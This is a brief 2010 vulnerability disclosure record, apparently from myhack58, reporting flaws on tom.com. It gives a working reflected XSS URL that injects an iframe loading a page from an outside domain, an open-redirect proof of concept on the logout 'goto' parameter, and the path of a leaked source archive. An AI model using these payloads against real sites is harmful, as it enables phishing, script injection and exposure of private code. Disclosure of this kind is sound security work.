Tom the Master Station xss cross-site vulnerabilities-vulnerability warning-the black bar safety net

2010-06-21T00:00:00
ID MYHACK58:62201027307
Type myhack58
Reporter 佚名
Modified 2010-06-21T00:00:00

Description

Test code:

http://www.tom.com/logout.php?backurl='"><iframe%20src=http://www. tjaote. com/blog/IMAGE/COMMON/qing. htm%20type="text/javascript"></iframe><"

! Then url redirect

poc:http://pass. tom. com/logout. php? goto=http://hi. baidu. com/5 4 2 7 5 1 8

File leaked a bit tasteless

poc:http://club.uhoop.tom.com/ucenter.tar.gz